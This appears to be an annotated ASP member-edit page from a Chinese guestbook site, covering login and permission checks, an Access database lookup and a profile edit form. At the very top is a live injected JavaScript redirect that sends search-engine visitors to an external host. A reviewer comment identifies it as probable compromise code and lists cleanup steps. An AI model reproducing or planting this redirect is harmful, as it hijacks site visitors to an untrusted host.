d:\wwwroot\wuchunhua\liuyan\modify.asp
001:
<script type="text/javascript">
/* NOTE(review): this script sits ahead of the opening ASP delimiter and has
   nothing to do with the member-edit logic that follows. It reads
   document.referrer and, when the referrer contains one of several
   search-engine substrings, replaces the page with an external host.
   Visitors who open the page directly are not redirected, so the change is
   easy to miss when the site is checked by typing its address.
   The placement and behaviour are consistent with code added after a site
   compromise (inferred; the page does not say how the line got here).
   The short substrings ("so", "sm", "dao", "gou") also match many unrelated
   referrers.
   Handling: treat the file as modified, compare it with a known-good copy,
   search the rest of the web root for the same redirect host, and review
   which accounts can write to this directory. */
var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
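<%
' ---- Request gate: login check, then validation of the "id" query parameter ----

' Writes the small error page used by this file (alert, then history back)
' and ends the response.
' msg is placed inside a client-side string without any escaping, so it must
' always be a fixed literal, never request data.
Sub AlertBackAndEnd(msg)
    Response.Write "<html>" & vbCrLf
    Response.Write "<body>" & vbCrLf
    Response.Write "<script language=""vbscript"">" & vbCrLf
    Response.Write "<!--" & vbCrLf
    Response.Write "Window.alert """ & msg & """" & vbCrLf
    Response.Write "History.back" & vbCrLf
    Response.Write "-->" & vbCrLf
    Response.Write "</script>" & vbCrLf
    Response.Write "</body>" & vbCrLf
    Response.Write "</html>" & vbCrLf
    Response.End
End Sub

' Only a logged-in user may edit member data.
If Session("IsPassed") <> TRUE Then
    Response.Redirect "login.asp?ErrMsg=请先登陆"
    Response.End
End If

' The member id to edit comes from the URL and is untrusted input.
Dim UserId
UserId = Request.QueryString("id")

' An empty id is treated as an invalid request.
If UserId = "" Then
    AlertBackAndEnd "请重新登陆"
End If

' First filter: reject anything VBScript does not consider numeric.
' IsNumeric alone still accepts signs, decimals and exponents, hence the
' per-character check below.
If NOT IsNumeric(UserId) Then
    AlertBackAndEnd "会员编号应为数字"
End If

' Second filter: every character must be an ASCII digit (codes 48-57).
' The characters are read directly with Mid; the earlier version copied them
' into a fixed 101-slot array first, so a numeric id longer than 100
' characters ended in a subscript error instead of a clean rejection path.
' NOTE(review): "0" and zero-padded values such as "007" pass this check.
Dim count, AscValue, IsPositiveInt, pos
IsPositiveInt = TRUE
count = Len(UserId)

For pos = 1 To count
    AscValue = Asc(Mid(UserId, pos, 1))
    If AscValue < 48 OR AscValue > 57 Then
        IsPositiveInt = FALSE
        Exit For
    End If
Next

If NOT IsPositiveInt Then
    AlertBackAndEnd "会员编号应为正整数"
End If
%>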
090:
<%
' ---- First authorisation pass and lookup of the member being edited ----
Dim flag, UserClass
Dim objConn, strSQL, objRS

' Deny by default; the checks below may switch the flag on.
flag = FALSE

' Class "1" (super administrator) may edit any member.
If Session("Class") = "1" Then flag = TRUE

' Class "2" (administrator) and class "9" (ordinary member) may edit their
' own record.
' NOTE(review): Session("Id") is compared with the id string from the URL;
' whether the login page stores it as a string or a number is not visible
' here - confirm, because a type mismatch would make this comparison fail.
If (Session("Class") = "2" OR Session("Class") = "9") AND Session("Id") = UserId Then flag = TRUE

' Open the Access database.
' NOTE(review): the relative path is resolved by Server.MapPath against this
' page's directory, so the .mdb file lives inside the web tree - confirm the
' server refuses direct requests for it.
DB = "./Board/database/BOARD.mdb"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(DB)

' Look the member up by id.
' NOTE(review): UserId is concatenated into the SQL text. That is acceptable
' only because the digit-only validation earlier in the file runs first; a
' parameterised ADODB.Command would remove that dependency.
' "Select *" also loads every column, including PASSWORD.
strSQL = "Select * From MEMBER Where ID=" & UserId
Set objRS = Server.CreateObject("ADODB.Recordset")
' 1 = adOpenKeyset, 3 = adLockOptimistic, 1 = adCmdText
objRS.Open strSQL, objConn, 1, 3, 1

' No such member: show the error page, release the ADO objects and stop.
If objRS.EOF Then
%>
<html>
<body>
<script language="vbscript">
<!--
Window.alert "用户不存在"
History.back
-->
</script>
</body>
</html>
<%
    objRS.Close
    Set objRS = Nothing
    objConn.Close
    Set objConn = Nothing

    Response.End
End If
%>
148:
<%
' ---- Second authorisation pass, using the level of the member being edited ----

' The member exists; read its level from the CLASS column.
If NOT objRS.EOF Then
    UserClass = objRS.Fields("CLASS")
End If

' An administrator (class "2") may edit an ordinary member (class "9").
If Session("Class") = "2" AND UserClass = "9" Then
    flag = TRUE
End If

' No rule granted access: show the error page, release the ADO objects, stop.
If flag <> TRUE Then
%>
<html>
<body>
<script language="vbscript">
<!--
Window.alert "你的权限不允许进行此次修改操作"
History.back
-->
</script>
</body>
</html>
<%
    objRS.Close
    Set objRS = Nothing
    objConn.Close
    Set objConn = Nothing

    Response.End
Else
    ' Record in the session that an update is allowed.
    ' NOTE(review): the flag says only that some edit was authorised, not
    ' which member id it was authorised for. The page that receives the form
    ' (updatemember.asp, not shown here) needs to repeat the authorisation
    ' check against the posted id rather than rely on this flag alone.
    Session("UpdatePermitted") = TRUE
%>
187:
<html>
188:
<head>
189:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
190:
<title>修改用户信息</title>
191:
<style type="text/css">
192:
<!--
193:
.style2 {
194:
font-family: Verdana, Arial, Helvetica, sans-serif;
195:
font-size: 14px;
196:
}
197:
.style3 {
198:
font-family: Verdana, Arial, Helvetica, sans-serif;
199:
font-size: 14px;
200:
color:#FF0000
201:
}
202:
-->
203:
</style>
204:
</head>
205:
<script language="vbscript">
206:
<!--
207:
'检查密码格式是否正确
208:
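Function CheckPass(upass)
    ' Returns TRUE when every character of upass is an ASCII letter or digit,
    ' FALSE otherwise. An empty string returns TRUE.
    '
    ' The characters are read directly with Mid. The earlier version copied
    ' them into a 16-slot array first, so any input longer than 15 characters
    ' raised a subscript error instead of returning a result.
    '
    ' This function runs in the browser only; the server-side handler has to
    ' apply the same rule to whatever it receives.
    Dim pos, AscValue, lupass

    CheckPass = TRUE

    ' Fold to lower case so a single letter range (97-122) covers both cases.
    lupass = LCase(upass)

    For pos = 1 To Len(lupass)
        AscValue = Asc(Mid(lupass, pos, 1))
        ' Outside a-z (97-122) and outside 0-9 (48-57): reject.
        If (AscValue < 97 OR AscValue > 122) AND (AscValue < 48 OR AscValue > 57) Then
            CheckPass = FALSE
            Exit For
        End If
    Next
End Function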
232:
233:
Sub CheckData()
    ' Browser-side check of form1 before it is submitted. Each failed check
    ' shows an alert and leaves without submitting.
    ' These checks can be skipped by posting to the handler directly, so they
    ' are a convenience for the user, not a control.
    Dim newPass, mail
    newPass = form1.passwd.value
    mail = form1.Email.value

    ' A non-empty password field means the password is being changed.
    If newPass <> EMPTY Then
        If Len(newPass) > 15 Then
            ' At most 15 characters.
            Window.Alert "用户密码不可以超过 15 个字符."
            Exit Sub
        ElseIf NOT(CheckPass(newPass)) Then
            ' Letters and digits only.
            Window.Alert "用户密码应该由英文字母或数字组成"
            Exit Sub
        ElseIf newPass <> form1.passwd2.value Then
            ' Both password fields must match.
            Window.Alert "“密码确认”字段与“用户密码”字段一定要相同"
            Exit Sub
        End If
    End If

    ' The verification code must be filled in.
    If form1.UpdateCode.value = EMPTY Then
        Window.Alert "请填写验证码"
        Exit Sub
    End If

    ' A non-empty e-mail field must at least contain "@".
    If mail <> EMPTY Then
        If InStr(mail,"@") = 0 Then
            Window.alert "请输入正确的E-mail地址"
            Exit Sub
        End If
    End If

    form1.Submit
End Sub
273:
-->
274:
</script>
275:
<body>
276:
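<%
' Generate the four-digit code that the update form must echo back, and keep
' it in the session for the handler to compare.
'
' Randomize is called once, before the loop; the earlier version reseeded the
' generator on every pass, which is repeated work and adds no randomness.
'
' NOTE(review): the code is four decimal digits from Rnd, which is not a
' cryptographic generator, and the form prints it next to the input box. It
' therefore confirms that the form was loaded, nothing more. If it is meant
' to stop forged cross-site posts (an assumption), a long random value in a
' hidden field would suit that purpose better.
Dim strCode, IntCode(3)
Dim i

Randomize
For i = 0 To 3
    IntCode(i) = Int(Rnd() * 10)
Next

strCode = CStr(IntCode(0)) & CStr(IntCode(1)) & CStr(IntCode(2)) & CStr(IntCode(3))
Session("UpdateCode") = strCode
%>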
290:
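<form name="form1" action="updatemember.asp" method="post">
<table width="600" border="0" align="center">
<tr>
<td><table width="100%" border="2" bordercolor="#6666FF">
<tr bgcolor="#6666FF">
<td colspan="2"><div align="center" class="style2">
以下为必填内容</div>
<%
' ErrMsg is taken straight from the query string, so it is HTML-encoded
' before being written into the page.
If Request.QueryString("ErrMsg") <> EMPTY Then
    Response.Write "<br>"
    Response.Write "<div align=""center"" class=""style3"">"
    Response.Write Server.HTMLEncode(Request.QueryString("ErrMsg"))
    Response.Write "</div>"
End If
%></td>
</tr>
<%
' Every database value below is HTML-encoded on output: the columns hold
' text that members typed in. The & "" turns a Null column into an empty
' string, which Server.HTMLEncode accepts.
%>
<tr>
<td width="21%" bgcolor="#99FF99"><div align="left" class="style2">用户帐号:</div></td>
<td width="79%" bgcolor="#99FF99"><input name="id" type="hidden" value="<%= Server.HTMLEncode(UserId) %>">
<span class="style2"><%= Server.HTMLEncode(objRS.Fields("NAME") & "") %></span></td>
</tr>
<%
' The stored PASSWORD column is no longer written into the page; a fixed mask
' is shown instead. The earlier version printed the column here, which
' exposed a member's password to any administrator allowed to open this form.
' NOTE(review): a column that can be printed this way is presumably stored
' unhashed - confirm, and plan a move to salted password hashes.
%>
<tr>
<td width="21%" bgcolor="#99FF99"><div align="left" class="style2">用户原密码:</div></td>
<td width="79%" bgcolor="#99FF99"><span class="style2">******</span></td>
</tr>
<tr>
<td bgcolor="#99FF99"><div align="left" class="style2">用户新密码:</div></td>
<td bgcolor="#99FF99"><input name="passwd" type="password" size="19" maxlength="16">
<span class="style2">(字母,数字,16位以下,不填则密码不变)</span></td>
</tr>
<tr>
<td bgcolor="#99FF99">新密码确认:</td>
<td bgcolor="#99FF99"><input name="passwd2" type="password" size="19" maxlength="16">
<span class="style2">(再输入一次密码)</span></td>
</tr>
<tr>
<td bgcolor="#99FF99">四位验证码:</td>
<td bgcolor="#99FF99"><input name="UpdateCode" type="text" size="18" maxlength="16">
<span class="style3">(<%= Session("UpdateCode") %>)
</span></td>
</tr>
<tr>
<td bgcolor="#99FF99"><span class="style2">真实姓名</span>:</td>
<td bgcolor="#99FF99"><input name="realname" type="text" size="10" maxlength="10" value="<%= Server.HTMLEncode(objRS.Fields("REALNAME") & "") %>">
<span class="style2">(请输入您的真实姓名,空白则不修改)</span></td>
</tr>
<tr>
<td bgcolor="#99FF99" class="style2">电子邮件:</td>
<td bgcolor="#99FF99"><input name="Email" type="text" size="30" value="<%= Server.HTMLEncode(objRS.Fields("EMAIL") & "") %>">
<span class="style2">(空白则不修改)</span></td>
</tr>
<tr>
<td bgcolor="#99FF99" class="style2">主页地址:</td>
<td bgcolor="#99FF99"><input name="Url" type="text" size="30" value="<%= Server.HTMLEncode(objRS.Fields("URL") & "") %>">
<span class="style2">(空白则不修改)</span></td>
</tr>
<%
' Only a super administrator (class "1") sees the level selector, and never
' for another class "1" account.
' Hiding the radio buttons is a display rule only: the handler that receives
' the post has to check the caller's class before it honours "Authority".
If Session("IsPassed") = TRUE AND Session("IsAdmin") = TRUE AND Session("Class") = "1" _
   AND objRS.Fields("CLASS") <> "1" Then
%>
<tr>
<td bgcolor="#99FF99" class="style2">用户权限:</td>
<td bgcolor="#99FF99" class="style2"><input type="radio" name="Authority" value="2"
<% If objRS.Fields("CLASS") = "2" Then Response.Write("Checked") %>>管理员
<input type="radio" name="Authority" value="9"
<% If objRS.Fields("CLASS") = "9" Then Response.Write("Checked") %>>普通会员</td>
</tr>
<%
End If
%>
</table>
</td>
</tr>
<tr>
<td><table width="100%" border="2" bordercolor="#6666FF">
<tr bgcolor="#6666FF">
<td colspan="2" class="style2"><div align="center">以下为选填内容</div></td>
</tr>
<tr>
<td bgcolor="#99FF99"><span class="style2">自我介绍</span>:</td>
<td bgcolor="#99FF99"><textarea name="Comment" cols="50" rows="6"><%= Server.HTMLEncode(objRS.Fields("COMMENT") & "") %></textarea></td>
</tr>
</table>
</td>
</tr>
<tr>
<td><table width="60%" border="0" align="center" cellspacing="20">
<tr>
<td><div align="right">
<input name="BtnSubmit" type="button" value="提交" onClick="CheckData">
</div>
</td>
<td><input name="BtnReset" type="reset" value="重置"></td>
</tr>
</table></td>
</tr>
</table>
</form>
<%
' The form above is the last reader of the recordset. Close it and the
' connection here, as the error branches earlier in the file already do.
objRS.Close
Set objRS = Nothing
objConn.Close
Set objConn = Nothing
%>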
396:
</body>
397:
</html>
398:
<%
End If
%
>
399:
400: